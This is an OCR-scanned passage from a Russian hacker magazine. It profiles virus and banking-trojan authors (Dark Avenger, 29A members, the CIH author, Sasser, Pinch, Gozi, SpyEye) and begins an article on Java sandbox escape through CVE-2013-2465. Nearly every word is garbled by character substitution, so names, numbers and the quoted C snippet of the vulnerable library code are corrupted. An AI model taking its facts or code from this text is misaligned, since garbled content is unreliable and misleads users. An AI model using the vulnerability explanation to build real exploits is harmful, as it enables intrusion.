С Оагк Ауепдег неразрывно св^зано им^ Веселина Бончева — спеииалиста в об- 
ласти исследовани^ вирусов, к которому Оагк Ауепдег испытывал силвнукз непри- 
^знв. Настолвко силвнукз, что вирусы Ес!сПе.2000 и Е<ЈсПе.2100 содержали строку 
«(с) 1989 оу УеззеИп ВопЈсһеу». 

Одним из веро^тных кандидатов на ролв Оагк Ауепдег ^вл^етс^ Тодор Тодоров, 
также известныи как Соттапс!ег Тозһ. Тодоров в бытноств студентом болгарскои 
наиионалвнои математическои школы про^вл^л завидныи интерес к написаникз 
вирусов. Он ^вл^лс^ сисопом УЈгиз Ехсһапде ВВ5, на которои все желакзидие могли 
обмениватвс^ исходниками вирусов. При әтом Тодоров принимал на обмен толвко 
новые исходные коды, что провоиировало обменивакзидихс^ на написание новых 
вирусов, при әтом их сложноств не имела значени^, главное — чтобы они были ра- 
бочими. Оагк Ауепдег был частым посетителем УЈгиз Ехсһапде ВВ5, и лкзбои допу- 
иденныи к обмену вирусами мог свободно с ним переписыватвс^. 



В 1993-м Тодоров исчез, многие говорили, что он уехал учитвс^ в США, и зто 
событие удивителвным образом совпало с прекраидением де^телвности Оагк 
Ауепдег. Тодоров вновв по^вилс^ в Софии в декабре 1 996 года, после трехлетнего 
отсутстви^. Ав ^нваре 1997 годахакер с псевдонимом ОагкАуепдег взломал ком- 
пыотеры в Софииском университете, которые входили в сетв Болгарскои акаде- 
мии наук. Оп^тв подозрителвное совпадение! Однако был ли Тодоров «мстителем» 
на самом деле, так и остаетс^ загадкои. 




1.оушСос1 - непризнанныи дуче киберфашизма 

Фигура әта оченв колоритна^ и в своем роде уникалвна^. 1_оутӨос! — духовныи 
лидер 31еа11һ Өгоир, крупнеишеи группировки вирусописателеи, деиствукзидеи 
на территории ех-1153В. С ним мало кто был знаком лично, кроме оченв узкого 
круга друзеи. Практически ничего не известно о том, как его на самом деле зовут, 
как он выпгтдит... Забавно, что нет достоверных сведении даже о том, какие виру- 
сы он написал сам, да и написал ли что-либо вообиде. Одного не отн^тв — журнал 
1пТес1:ес1 УоЈсе в свое врем^ был достаточно кошерен (подтверждакз, сам на нем 
вырос. — Прим. ред.). 

Бурнукз де^телвноств по сколачиваникз своеи вирус-банды 1_оутӨос! начал 
в 1994 году. Благодар^ многочисленным срачам в ФИДО группа получила опре- 
деленнукз известноств, и состав ее начал расти, как снежныи ком. Плкзс ко всему 
на прои,есс становлени^ вирусмеикерства в Украине повли^л тот факт, что статыз 
за распространение вирусов здесв по^витс^ толвко через дес^тв лет. Не исклкз- 
чено, что именно де^телвноств ЗТеаИҺ Өгоир спровои,ировала россиискии «әкспо- 
нени,иал_.ныи вирусныи взрыв», которыи до әтого произошел в Болгарии. 

ЗӨ просушествовала шеств с половинои лет, после чего была офии,иал_.но за- 
крыта в феврале 2001 -го. Однако на әтом ее де^телвноств не закончиласв: пол- 
года она деиствовала как силвно законспирированна^ организаии^ с жестким от- 
бором кандидатов (по другим сведени^м, әто уже была кака^-то секта, благо 1_Ө 
мозги ппомыватһ умел маотепоки^. 



От событии, св^занных с ЗЈеаКҺ Өгоир, офигевали не толвко местные, но и все 
мировое сообидество. Американска^ фирма ЈОеТепзе, состо^ида^ из бывших раз- 
ведчиков и собиракзида^ инфу на продажу, подготовила подробныи отчет о де^- 
телвности ЗЈеаШп Өгоир, озаглавленныи «(ЈкгаЈпЈап-ВиззЈап Наскегз Ше ЗЈеаИҺ 
Өгоир апс! 11з 1_еас!ег, 1_оујпӨОО». Как говоритс^, паи,ан пришел к успеху. Особо 
интересными в отчете выпгтд^т пассажи о св^з^х русских хакеров с Алв-Каидои 
и о том, что 1_оујпӨОО — засланныи казачок от ФСБ. 

В кон1де кони,ов ФСБ добраласв до 1_Ө — по засвеченному 1Р была установлена 
его личностһ, и о его де^телвности было сообшено текуидему работодателкз, ко- 
торыи, не долго дума^, уволил его. Что характерно, 1_оутӨОО'у ничего предБ^витв 
не смогли, позтому его и не посадили. После всех әтих событии 1_оујпӨОО стал от- 
крыто враждоватв со си,енои, пыта^св донести до ее участников, что врем^ си,ены 
кончилосһ и ничего хорошего от афишировани^ своеи де^телвности их не ждет. 
Полагакзт, 1_Ө несколвко огорчило, что киберфашизм (идеологи^ превосходства 
лкздеи с компыотерно-техническим взпгтдом ума, наве^нна^, со слов самого 1_Ө, 
книгои «Маин Кампф» и шестыо бутылками темнои «Балтики»), к которому он так 
стремилс^, уже реализован, но армикз вирусописателеи возглавл^ет не он, а ка- 
кие-то корпораи,ии и правителвства. 

Многие склон^кшт к мысли, что 1_оутӨос! был весвма посредственным вир- 
меикером, однако выдакзидимс^ беллетристом и идеологом. В насто^идее врем^ 
поток его сознани^ доступен на саите с1оота.ги, кроме того, он при- 
сутствует в ЫуеЈоигпа! и в контактике. Вроде бы даже пишет му- 
зыку. Вот |дитата одного анонимуса: «Ваш Мистер Фриман (ака 
Мг.Ғгеетап) ^вл^етс^ не чем иным, как воплоидением болвно- 
го на голову 1_оутӨОО'а. Весв смысл скзжета, кажетс^, пропи- 
тан глубоким смыслом, но әто толвко на первыи взпгтд так. Все 
дело в неврозе и вытекакзидеи отскзда жажде славы даже в та- 
ком виде, как принижение всех и вс^». 

Фраза оченв емко характеризует 1_Ө. 









гОтЫе: метаморфных дел мастер 

Группа 29А — одна из самых известных вирмеикерских команд. Ее первоначалвныи 
состав сформировалс^ внутри Оагк Ыос!е ВВ5 из Испании. В середине дев^ностых 
годов станиут была уже полностыо посв^идена вирусам и участие в дискусси^х на неи 
принимали многие известные представители УХзсепе. Дгт многих вирмеикеров ОЫ 
стала местом релиза их проектов. 29А изначалвно не была вирус-группои. 29А — зто 
название журнала, а также интернаи,ионалвнои группы лкздеи, причастных к его соз- 
даникз. 

Далеко не последнкжз ролв в 29А играл некто гОплЫе, оченв видныи вирмеикер 
и, между прочим, наш соотечественник. Кратко его де^телвноств можно охаракте- 
ризоватв так: новизна идеи и нестандартныи подход при некоторои кривости реа- 
лизаи,ии. Одним из преобладакзидих факторов в его работе была модулвноств всего, 
что он сделал, и простота повторного исполвзовани^. Например, весв его стаф был 
хорошо задокументирован и содержал пон^тные примеры, как и что делатв. Нара- 
ботки гОплЫе можно наити на саите 20плЫе.һо51:.5к. 

Основным интересом дгт ^ОплЫе было совершенствование технологии полимор- 
физма и метаморфизма дгт разработки самораспростран^кзидихс^ программ. Под 
әто дело было разработано много движков по дизассемблированикз и вычисленикз 
длины команд проиессора. Также интерес представл^ет движок, генерирукзидии му- 
сорные инструк1дии дгт расшифровшика с заданным распределением и әнтропиеи. 
Так как программы на ^зыках высокого уровн^ содержат какои-то определенныи на- 
бор инструк1дии, полиморфные вирусы первых поколении легко определ^лисв путем 
несложных математических вычислении некоторых параметров частеи секи,ии кода. 



Апофеозом разработокгОплЫестал метаморфныи вирус М1зиа11. Кратко алгоритм его 
работы можно уложитв в три пункта: 

• дизассемблироватв фаил; 
интегрироватв фаил с телом вируса; 

• ассемблироватвфаил. 



То еств инструк1дии исполн^емого фаила оказывалисв перемешанными с инструк- 
иутми вируса. Естественно, зто работало не дл^ всех фаилов и потребл^ло до фига 
пам^ти, но сама иде^ впечатл^ет. 

Личноств гОплЫе (в просторечии — зомба) так и осталасв загадкои дл^ широкои 
обшественности, хот^ предположени^ о его нынешнеи виртуалвнои личности вы- 
сказывакзтс^ с завиднои регул^рностыо. Широко распространены два мнени^: ВНС 
(Виддег Никкег Сге\л/) — әлектронныи журнал, которыи начал выпускатвс^ с сент^- 
бр^ 2005 года, — от имени несколвких виртуалвных персонажеи вел именно ^ОплЫе, 
а также что его новыи ник — Уа2оЫе2 (Ух а 2оплЫе оп Ыех1: еп1гу Т). На такие выводы 
наталкивает некотора^ стилистическа^ преемственноств всех обозначенных персо- 
нажеи, однако по факту все әто может бытв просто подражателвством, подобным па- 
донкафскому сленгу или луркспику. 

Из 29А гОплЫе окончателвно вышел в 2007 году, а вешдтв под своим широко из- 
вестным ником перестал с 2008 года, тогда же, когда почил в бозе и журнал 29А. Все 
әто было св^зано со смертыо УХ-си,ены как таковои, потому что все болвшее количе- 
ство вновв прибывакзших вирмеикеров стали повернуты болвше на деструктивности 
и получении профита в виде денежных знаков, чем на новаторстве и развитии новых 
технологии. 




Чзнв Ин Хао - автор «Чернобылл» 

Чәнв Ин Хао (Сһеп ҮЈпд Нао) родилс^ 26 апрел^ 1 975 года наТаи- 
ване. Многим обывател^м он известен по аббревиатуре, со- 
ставленнои из его инии,иалов, — С1Н. Именно так называетс^ 
вирус, имекзидии второе, более попул^рное название — «Чер- 
нобылв», которое он получил из-за даты срабатывани^ своеи 
деструктивнои составл^кзидеи. Кстати, сам автор зту дату вы- 
брал, потому что әто была дата его рождени^. Вирус работал 
в среде операи,ионнои системы \Л/Јпс1о\л/з 95 и отличалс^ отно- 
сителвно малым размером — один килобаит. 

С1Н считаетс^ первым вирусом, способным выводитв из стро^ аппаратнукз частв 
компыотера. Деструктивна^ составл^кзида^ предусматривала два деистви^: пере- 
записв содержимого В105, а затем — уничтожение данных на жестком диске. Так 
как микросхема ПЗУ зачастукз была впа^на в материнскукз плату, дгт восстановлени^ 
нужна была перепаика ПЗУ с ее предварителвным перепрограммированием. Однако 
в болыЈЈинстве случаев материнки просто выбрасывалисв на свалку. 

С1Н обнаружен «в живом виде» в Таиване в икзне 1 998 года — автор вируса зараз- 
ил компыотеры в местном университете Датун (Таибеи), где он в то врем^ проходил 
обучение. В интервыо, данном много лет спуст^, Чәнв Ин Хао вспоминал, как он при- 
шел к идее написани^ вируса: по его словам, ОС \Л/Јпс!о\л/5 95 представл^ла собои 
один болыиои системныи баг. Он поставил перед собои и,елв написатв максималвно 
компактныи код, получакзидии ^дерные привилегии из полызователызкого режима. 
Что касаетс^ перезаписи В105 — решил проверитв, деиствителвно ли еств пробле- 
ма, что вирус может его перезаписатв. Как говоритс^, резулвтат проверки превзо- 
шел все ожидани^ — через некоторое врем^ вирус выбралс^ за пределы Таиван^. 
Спуст^ примерно мес^и, зараженные фаилы были обнаружены на несколвких аме- 
риканских веб-серверах, распростран^кзидих игровые программы (да блин, ^ сам им 
заразилс^ через пиратскукз Оипа2000. — Прим. ред.). 

Не ожидавшии такого быстрого развити^ событии, Чәнв Ин Хао сам выложил 
исходныи асмовскии код и принес публичные извинени^ всем тем, кто пострадал 
от воздеистви^ С1Н. Исходники спровои,ировали по^вление различных пересобран- 
ных версии вируса. 

26 апрел^ 1999 года (примерно через год после распространени^) настал часХ. 
По различным оиенкам, в әтот денв во всем мире пострадало около полумиллиона 
компыотеров. 

Отсутствие офии,иалвных жалоб со стороны таиванызких компании и суидеству- 
кзидан нормативна^ база позволили Чәнкз в апреле 1999 года избежатв наказани^. 
Более того, С1Н сделал его знаменитым: благодар^ написаникз вируса Чәнв Ин Хао 
получил престижнукз работу в крупнои компыотернои компании \/\/аһоо 1п1:егпа1:Јопа1 
ЕпЈегрпзе в качестве тестировидика компыотерного оборудовани^. Чәнв Ин Хао был 
арестован толвко 20 сент^бр^ 2000 года, когда один из таиванских студентов все-та- 
ки подал иск на возмеидение уидерба, причиненного С1Н. Ему грозило до трех лет 
лишени^ свободы, однако ход следстви^ и сам приговор так никогда и не были об- 
народованы. О далвнеишеи судвбе Чәнв Ин Хао известно, что он с 2006 года работал 
инженером в ӨЈдаоуЈе Тесһпо1оду, в насто^идии момент основателв стартапа с подо- 
зоителвно знакомои аббоевиатүоои С1Н. 




Марек 
Стрихавка - 
Бенни, но не Хилл 

Из деанонимизированных членов 29А наиболее известен Марек Стрихавка (Магек 
ЗЈпһаука) ака Веппу. Родилс^ он 24 марта 1982 года в Брно, Чехи^. Его конһком всегда 
была кониептуалвноств, он старалсл писатв вирусы так, как никто до него не делал. 

Среди самых известных его проектов были такие пионеры своих областеи: 

ӘоШЕТ — вирус дл^ платформы .ЫЕТ; 

51теат — вирус, исполвзукзш.ии алвтернативные потоки данных ЫТҒЗ; 
• \/\/Јпих — кросс-платформенныи вирус, работоспособныи и в\Л/тс1о\л/5, и в Ыпих; 
1_еүја1:һап — многопоточныи вирус; 

Зего1отп — вирус, исполвзукзидии генетические алгоритмы. 

Из состава 29А Стрихавка ушел в начале 2003-го по причине разочаровани^ в но- 
во^вленных вирмеикерах. По его словам, в 29А его интересовал техническии про- 
гресс, изобретение и создание новых технически совершенных и интересных виру- 
сов, а не само распространение. 

Между тем некоторые его черви исполвзовали серверы 1РС дл^ получени^ ко- 
манд и далвнеишего распространени^, что ставит его слова под сомнени^. 

В но^бре 2004 года чешска^ антивирусна^ компани^ 2опег 5оТглл/аге прин^ла 
Марека на работу — Веппу был назначен главным разработчиком 2опег АпИ-УЈгиз 
{7.АУ). Представителв 2опег 5оТглл/аге Әрик Паипер (Епк Рјрег) так прокомментиро- 
вал деистви^ своеи компании: «Де^телвноств Веппу в области написани^ вирусов 
сталахорошим доказателвствомтого, чтоон понимаетсхему работы вирусныхатак. 
Создатели вирусов часто подчеркивакзт, что подход к созданикз зашиты в том или 
ином продукте оказываетс^ примитивным. Мы уверены, что о разработках Веппу 
такого сказатв будет нелыз^». 

После устроиства на работу в 2опег личноств Марека Стрихавки стала досто^- 
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его персоналыныи компыотер. Реид проводилс^ по подозреникз его в причастности 
к разработке сетевого черв^ 501 31аттег, что, однако, не подтвердилосв. По дру- 
гои информаи,ии, в личнои переписке Веппу призналс^, что деиствителвно написал 
51аплплег, но никогда не выпускал его в сетв. Он толвко выложил исходники дгт озна- 
комлени^, которые кто-то скомпилировал и запустил на выполнение. 

Несмотр^ навсепередр^ги, МарекСтрихавкадосихпорработаетв2опег5о1тлл/аге. 




Александр Демченко — автор РЈпсһ 

Рјпсһ — одна из наиболее активно исполвзу- 
емых тро^нских программ в рунете, первые вер- 
сии которои были написаны Александром Демчен- 
ко ака сооап2к в 2003 году. Ее исходныи код, по его 
собственным словам, выложили в интернет, запретив 
исполвзоватв его в лкзбых противоправных ыдллх. И тут все 
заверте... Всеобидукз известноств РЈпсһ приобрел с копираитами 
сЈаплгаЈ и 5сга1сһ. 

Структурно РЈпсһ состоит из несколвких частеи — билдера (оиПсЈег) бота, ад- 
министративнои панели и парсера (расшифровидика сграбленнои информаи,ии). 
Соответственно, сЈаплгаЈ допиливал билдер, патчил баги и нараидивал функи,ионал, 
а 5сга1:сһ занималс^ парсером. 

Всего было три основных вида РЈпсһ: до версии 2.60, котора^ ушла в паблик, раз- 
работкои занималс^ сооап2к, затем сЈаплагаЈ вз^л сори,ы и организовал свои собствен- 
ныи бизнес по продаже новых версии. Краинкзкз версикз билдера РЈпсһ 2.98 взломал 
некто Уазуа и выложил в паблик под названием РЈпсһ 3. 

В последних верси^х РЈпсһ особенно доставл^ет иде^ обхода антивируснои за- 
идиты путем әмул^иии нажати^ полвзователем кнопки «Разрешитв» во всплывакзидем 
сообшении от антивируса о подозрителвнои активности. Таким образом обходилс^ 
антивирус Касперского и фаирвол Ои1роз1. 

В декабре 2007 года Федералвна^ служба безопасности России таки установила 
и задержала авторов вредоноснои программы РЈпсһ. Вот выдержка из протокола: 

«Фархутдинова Дамира (1986 года рождени^) (ака сЈаплгаЈ) и Ермишкина Алексе^ 
(1985 года рождени^) (ака 5сга1:сһ) признатв виновными в совершении преступле- 
ни^ по ч. 1 статви 273 УК РФ и назначитв наказание: 

Фархутдинову Д. — в виде лишени^ свободы сроком на один год шеств мес^иев, 
со штрафом 30 000 рублеи. 

Ермишкину А. — в виде лишени^ свободы сроком один год, со штрафом 20 000 
рублеи. 



на основании статви / ј ук нф наказание в виде лишени^ своооды считатв услов- 
ным с испытателвным сроком в два года каждому». 

Всего за период с начала 2005 года по икзнв 2007 года с!аплгај и ЗсгаЈсһ распро- 
странили (признали свокз вину) пор^дка дес^ти модификаи,ии тро^нских программ 
Рјпсһ. 

Рјпсһ породил наследие в виде тро^на 11ҒВ 51еа1ег (1)50 ҒНе Ва! 51еа1ег), написан- 
ного на Ое1ргп с исполызованием части его кода. Автором 11ҒВ ^вл^етс^ уже упом^ну- 
тыи здесв Уа2оЫе2. Также получил некоторое распространение тро^н Хтсһ, пред- 
ставл^вшии собои переписанныи Ртсһ с добавлением различных функи,ии. 

В насто^шее врем^ родде^телвности с!аплгај остаетс^ неизвестным (можетбытв, 
и на органы работает), и на хакерских форумах он стараетс^ не отсвечиваты Короче 
говор^, находитс^ под колпаком у папаши Мкзллера. 



Свен Лшан - «повелителв сети» 

Согласно отчету компании 5орһоз, ответственноств за 70% всех заражении вредо- 
носными программами в 2004 году несет один человек, автор червеи Ые1:5ку и 5аззег. 
Им оказалс^ ученик (на тот момент) среднеи школы Свен ^шан (5уеп Јазсһап) из не- 
меи,кого города Роттенбурга, родившиис^ 29 апрел^ 1986 года. 

В течение несколвких днеи червв 5аззег заразил пор^дка 250 тыс^ч компыотеров 
по всему миру. В св^зи с әпидемиеи компани^ МјсгозоТ! назначила денежное возна- 
граждение в размере 250 тыс^ч долларов за лкзбукз информаи,икз, котора^ поможет 
арестоватв создателеи 5аззег. До әтого момента подобнои чести удостаивалисв 
толвко авторы червеи 1_оуе5ап и Мус!оот. За наградои в поли1дик) обратилисв два 
человека, данные о личност^х которых не раскрывакзтс^. Как оказалосв, ^шан оченв 
гордилс^ тем, что сделал, и активно хвасталс^ школвным при^тел^м. 

Немеика^ полиии^ поимала Свена пр^мо за компыотером, на жестком диске ко- 
торого обнаружилисв сори,ы 5аззег. Через некоторое врем^ он призналс^ и в разра- 
ботке первых вариантов Ые1:5ку. 

По словам ^шана, Ые1:5ку он создал дгт очистки компыоте- 
ров от Мус!оопл и Вад!е, 5уеп закончил разработку штаммом 



Ые1:5ку.К, однако после его ареста по^вилисв новые вер- 
сии, написанные подражател^ми. Если Ые1:5ку был про- 
сто почтовым червем, то 5аззег был уже на пор^док А 
опаснее, так как исполызовал длл своего распростра- 
нени^ у^звимоств в службе 1_5А55 МјсгозоТС \Л/тс!о\л/5 ј| в 
и не требовал какого-либо взаимодеистви^ с полв- 
зователем атакуемого компыотера. Благодар^ пол- 
ностыо автоматическому |диклу размножени^, 5а55ег 
распространилс^ достаточно быстро. 

Помимо новых версии Ые1:5ку, после ареста ^ша- 
на антивирусные компании обнаружили п^тыи вариант 
черв^ 5а55ег, которыи, в отличие от предшественников, 
пыталс^ обезвредитв варианты Вад!е, удал^^ из системного 





реестра клкзчи, созданные конкурентом. Данные факты вызва- 
ли подозрение, что Свен работал в команде, однако подтверждении зтому 
так и не было наидено. Кроме того, черви, исполызукзидие у^звимости сетевых сер- 
висов ОС \Л/Јпс!о\л/5 (например, 1_оуе5ап), обычно были плодом реверс-инжиниринга 



патчеи от МјсгозоТС (опе-с!ау — у^звимоств первого дн^), и безопасники выражали 
сомнение, что 17-летнии школвник мог все зто замутитв в одиночку. 

^шан отделалс^ 21 мес^ием условного заклкзчени^, так как на момент разработ- 
ки и выпуска червеи в «свободное плаванве» ему еиде было 17 лет. В сент^бре 2004 
года немеика^ компани^ ЗесигеРоЈп! вз^ла Свена ^шана к себе на работу на долж- 
ноств младшего разработчика. В ответ на әто компани^ Н+ВЕО\/ Оа1еп1есһшк (ныне 
Аујга) разорвала все партнерские отношени^ с ЗесигеРоЈп!:. Исполнителвныи дирек- 
тор Н+ВЕОУ за^вил тогда, что әтот поступок 5есигеРот1: может негативно отразитв- 
с^ на отношении потребителеи к антивирусному ПО обеих компании. 

Последние семв лет ^шан ударилс^ в веб-дизаин и коммериикз, работает 
в управлении немеи,кого проекта ВаоаШисһзег, которыи занимаетс^ возвратом де- 
нег при совершении покупок в онлаин-магазинах Германии. 




Никита Кузыиин со товарииди: грабители виртуалвных банков 

В начале 201 3 года окружна^ прокуратура Манхәттена предБ^вила обвинени^ трем 
программистам из Восточнои Европы в создании и исполызовании тро^нскои про- 
граммы Өо2Ј, предназначеннои дл^ кражи учетных данных систем ДБО. Главныи 
создателв Өогј — Никита Кузвмин (приемныи сын певи,а Владимира Кузвмина, ко- 
торого ты все равно не знаешв), был арестован в США в но^бре 2010 года. В мае 
201 1 года Кузвмин признал себ^ виновным и подписал соглашение со следствием 
о сотрудничестве, дав показани^ на своих сообшников. Два других его поделвни- 
ка, Денис Чаловскис (Оегпзз Са1оузкЈ5 ака МЈапгп) из Латвии и Михаи Паунеску (МЈҺаЈ 
Раипезси ака УЈгиз) из Румынии, были арестованы позже, в кони,е 2012 года. 

Разработку Ө021 Кузвмин начал где-то в 2005 году, однако в массы продукт по- 
шел толвко в 2007-м. Кстати, документы следстви^ утверждакгг, что Никита Кузвмин 
был толвко вдохновителем — он выдвинул определенные технические требовани^ 
и нан^л стороннего программиста, которыи упоминаетс^ как СС-2 (со-сопзрЈга1:ог-2, 
«соучастник № 2»), дгт написани^ кода Ө021. Впоследствии Денис Чаловскис, что на- 
зываетс^, открыл второе дыхание у проекта, доработав Ө021 на исполвзование тех- 
нологии веб-инжектов. Паунеску отвечал за ВиИеЈРгооТ-серверы, обслуживакзидие 
командные иентры Ө021, а в придачү еше и 7.еиз со ЗрүЕүе. 



В 2008 году в силу каких-то организаи,ионных и технических проблем Кузвмину 
пришлосв отказатвс^ от сдачи тро^на в аренду и переити к схеме пр^мои прода- 
жи. Өо21 стал предпагатыз^ на продажу по и,ене 50 тыс^ч долларов. Справедливости 
ради стоит отметитв, что аналогичныи Өогј тро^н 7.еиз продавалс^ по куда более гу- 
маннои |дене. 

Кузвмина и Ко, по мненикз некоторых әкспертов, сгубил переход с европеиских 
на американские банки в качестве |делеи, что в конечном итоге привлекло к Өогј вни- 
мание ФБР. Сыграло свокз ролв и заражение Өогј около 190 компыотеров ЫА5А. По- 
мимо всего прочего, Кузвмин настолвко уверовал в свокз безнаказанноств, что стал 
пренебрегатв методами своеи анонимности, хот^ его проект 76зеплсе по предо- 
ставленикз услуг с исполвзованием Өо2Ј беззаботно просуидествовал около двух лет. 

В соответствии с постановлением Европеиского суда по правам человека, Лат- 
ви^ прин^ла решение об отказе в әкстрадии,ии в США Чаловскиса, которыи провел 
в ткзрвме Риги почти год с декабр^ 2012-го по окт^брв 2013-го. Паунеску же до сих 
пор ожидает решени^, отдадут его США или нет. 




Александр Панин - шпионскии глаз 

Приблизителвно в декабре 2009 года на черном рынке по^виласв алвтернатива 
банковскому тро^ну 7еиз — ЗруЕуе, функи,ионал и состав (билдер и админ-панелв) 
которого были оченв схожи. Тро^н ЗруЕуе, проника^ на компыотер, собирал кон- 
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и пин-коды. 

Суд^ по сообидени^м на хакерских форумах, которые обнаружил Браиан Кребс, 
в окт^бре 2010 года создателв Теив 51аујк передал исходные коды своему конкурен- 
ту — разработчику ЗруЕуе и прекратил далвнеишукз разработку. Кодбыл передан че- 
ловеку с ником Нагс!егтап, известным также как ӨпоосЈетоп. По словам Нагс!егтап, 
исходные коды он получил на безвозмезднои основе и брал на себ^ обслуживание 
всех бывших клиентов 51аујк, в далвнеишем предполагалосв некое сли^ние исход- 
ных кодов Теив и ЗруЕуе. И деиствителвно, с ^нвар^ 201 1 года исследователи анти- 
вирусных компании начали обнаруживатв новые гибридные версии ЗруЕуе, исполв- 
зовавшие частв кода и модулеи 2еиз. 

По ои,енкам спеииалистов, ЗруЕуе были заражены в обидеи сложности около 1 ,4 
миллиона компыотеров во всем мире, что, естественно, не могло не привлечв вни- 
мание правоохранителвных органов и спеииалистов в области зашиты информаиии. 

В ходе кампании по прекраиденикз работы командных иентров ботнетов, постро- 
енных на базе тро^нов Теив и ЗруЕуе, проводимои МјсгозоТ. в марте 2012 года, были 
установлены некоторые контактные данные Спһос1етоп, такие как 1СО, Јаооег и еплаН. 

Летом 2013 года власти США за^вили об аресте гражданина России Александра 
Панина, которыи был задержан 28 икзн^ сотрудниками Интерпола и әкстрадирован 
из Доминиканскои Республики в США. Урожениу Твери Панину было на тот момент 
24 года. Ему вмен^ласв кража 5 миллионов долларов у несколвких американских 
банков. 28 ^нвар^ 2014 года на суде в Атланте Панин признал, что он ^вл^лс^ одним 
из разработчиков ЗруЕуе и его псевдоним — ӨпоосЈеплоп. Приговор Александру Па- 
нину будет вынесен 29 апрел^ 2014 года. По американскому законодателвству ему 
может грозитв до 30 лет лишени^ свободы. 

В ходе следстви^ стало известно о том, что Панин сотрудничал с гражданином Ал- 
жираХамзои Бенделладжи, также известным как Вх1, которыи выступал в роли бот- 
мастера серверов ЗруЕуе, а также продавиа. Бенделладжи был задержан в аәропор- 
ту Бангкока в Таиланде 5 ^нвар^ 2013 года, когда пыталс^ вылететв в Алжир. В мае 
он был әкстрадирован в США. Не исклкзчено, что его арест немало поспособствовал 
установленикз насто^идего имени ӨпоосЈетоп, с которым Вх1 имел тесные контакты. 

По словам друзеи, уАлександра никогда не быложелани^ заработатв кучу денег, 
статв богачом, хот^ он достаточно хорошо зарабатывал. 

Говор^т, что он не такои, как другие хакеры — грабители банков; Александр был 
сторонником трансгуманизма, мечтал создатв сверхчеловека, искусственныи ин- 
теллект, верил в иифровое бессмертие... дгт того, чтобы в зтом убедитвс^, доста- 
точно почитатв его _ЈуеЈоигпа1, где он писал под псевдонимом јшсуеплас!. 

Однако истори^ ЗруЕуе на аресте Панина не заканчиваетс^, так как он хот^ и был 
одним из клкзчевых разработчиков, но далеко не единственным. Суд^ по всему, про- 
граммисты, которые писали модули дгт ЗруЕуе, продолжили свокз вредоноснукз де- 
^телвноств, и в 2012 году на свет по^вилс^ тро^н ТПоп, также известныи как ЗруЕуе 
2. Видимо, Панин, заметив присталвное внимание к своеи персоне, решил залечв 
на дно, а его сообидники по разработке стали вести отделвныи зЈсЈе ргојес.. Следует 
отметитв, что ТПоп имеет функиионал по удаленикз предыдуших версии ЗруЕуе — 
әто в очереднои раз говорит о преемственности двух данных вредоносных наборов 
дгт кражи банковскои информаиии. 

ЗАКЛК>ЧЕНИЕ 

Судвбы рассмотренных здесв личностеи сложилисв по-разному. В лкзбом случае 



налиио тот сракт, что всех зтих лкздеи рано или поздно приорали к рукам или спеи,- 
службы (после посадки), или компании, занимакзидиес^ вопросами компыотернои 
безопасности. Посему совет: чтите уголовныи кодекс, еств куча мирных способов 
реализаи,ии своих программистских стремлении. И-!: 



ТЕОРИЛ И ПРАКТИКА ПОРАБОШЕНИЛ 



С выходом пөрвои вөрсии Јауа разработчики увөр^- 
ли нас в өө полнои бөзопасности. Жөсткии контрол^ 
за размөром массивов сводит на нолһ атаки с вы- 
ходом за прөдөлы (угадаи чөго :)), исполһзованиө 



пөсочнии,ы изолируөт приложөниө от осталһнои си- 
стөмы, а менеджер безопасности предотвраш,ает лко- 
бые попытки приложени^ выполнитв деиствие, несу- 
ш,ее угрозу компвкотеру полһзователд. Тем не менее 
толһко за последнии год было зафиксировано около 
14 миллионов атак с исполһзованием Јаүа-әксплои- 
тов. 0 том, почему и каким образом әто происходит, 
поидет речв в әтои статве. 



ВЫХОДИМ ЗА ГРАНИиЫ ПЕСОЧНИ^Ы 

Вс^кое приложение Јауа, полученное из ненадежных источников (например, скачан- 
ное), выполн^етс^ в так называемои песочнии,е. Әто изолированна^ от фаиловои си- 
стемы и сети среда, грании,ы которои задает менеджер безопасности. Он свер^ет 
деистви^ приложени^ со списком разрешении и, если приложение пытаетс^ выпол- 
нитв что-то запреиденное, бросает исклкзчение безопасности. 

Разрешени^ в Јауа дел^тс^ на группы: фаилова^ система, сетв, сокеты, рефлек- 
си^ и так далее. Присутствует и класс АПРегпгпззЈопз, которыи вклкзчает в себ^ все 
возможные разрешени^. По умолчаникз менеджер безопасности запрешает все 
деистви^ с фаиловои системои, сетевые подклкзчени^, кроме подклкзчени^ к саи- 
ту, с которого был скачан апплет, запуск программ и тому подобное. Позтому, чтобы 
проникнутв в систему и обосноватвс^ там, злоумышленнику необходимо расширитв 
свои права или же совсем избавитвс^ от менеджера безопасности. 

Чтобы продемонстрироватв, как әтого добитвс^, возвмем, к примеру, нашумев- 
шукз недавно у^звимоств СУЕ-2013-2465 ( подробно описана тут ), исполвзованнукз 
в малвари НЕ11В:Васкс1оог.Јауа.Адеп1:.а. У^звимоств представл^ет собои возмож- 
ноств выхода за пределы массива. 
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И тут возникает два вопроса: откуда в Јауа выход за пределы массива и что нуж- 
но сделатв, чтобы зтим восполызоватыз^? 

Все дело в библиотечном коде, написанном на С. Выход за пределы происходит 
в методе 51:оге1пладеАггау из библиотеки јге/Ып/амт. . с111 (подробныи исходныи код 
можно посмотретв на саите). 



с1а1:аР = (ип5Ј§пес! сһаг * ) (*епу) -^бе^РгЈтЈ^јуеАггауСгЈ^Јса^епу,, га5"сегР-><-' 
јсЈа-Са^ 1\1111_1_); 

Ј-Ғ (сЈ а1:аР == 1\ИЛ.1.) ге^игп Ө; 
сРа-Са Р = с Ја-СаР + ҺЈп1:Р- >с1а1:аО-Ғ-Ғ5е 1:; 

-Ғог (у=Ө; у < га5"СегР- >һеЈ§һ"С; у++, стРа^СаР += тЗ^гхсЈе, сРа^са Р += <-■ 
ҺЈп1:Р->5$1:гЈс1е) { 

тетсру(сОа"СаРЈ стРа^а Р, г а5"СегР->ыЈс!"с:һ*ҺЈ1Тс:Р->питСһап5) ; 



Если значение пол^ с1ат_аО-Ғ-Ғ5ет_ будет велико, то зто позволит выити за преде- 
лы массива с!ат_аР и записатв нужное значение в нужнукз ^чеику пам^ти. Метод 
51:оге1пладеАггау вызываетс^, к примеру, в классе А-ҒҒтеТгапз-ҒогтОр, которыи выпол- 
н^ет аффинное преобразование 20-координат исходного изображени^ или растра 
в 20-координаты конечного изображени^ или растра. 

Значение пол^ ҺЈ-п-сР->с1ат_аО-Ғ-Ғ5ет_ получаетс^ из пол^ с1ат_аВ-_т_0-Ғ-Ғ5ет_ класса 

В^/т-рРлгк-рНВд^т-рг Р.прлпрдтрп1-,нп ппрпгјпдгчпрднмр н\/жнп кыпппнатк в паптп Пп- 



